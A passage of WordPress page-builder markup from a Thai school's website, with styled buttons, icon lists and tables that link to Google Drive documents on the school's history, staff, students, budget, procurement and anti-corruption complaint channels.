{\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"abc6c06d\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"b0641f20\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"id\":260,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" class=\"wp-image-260\"/></figure>\n<!-- /wp:image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vuZFLIWRkwFNN4GX0n7enJwyg8eDIzBQ/view?usp=share_link\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ics-Zh-M3PJmB2iudN_y7YVcdRFtVcLi/view?usp=drive_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1s25QprjH5mZ-zGGQHfrL8aL1LztcZZVs/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" 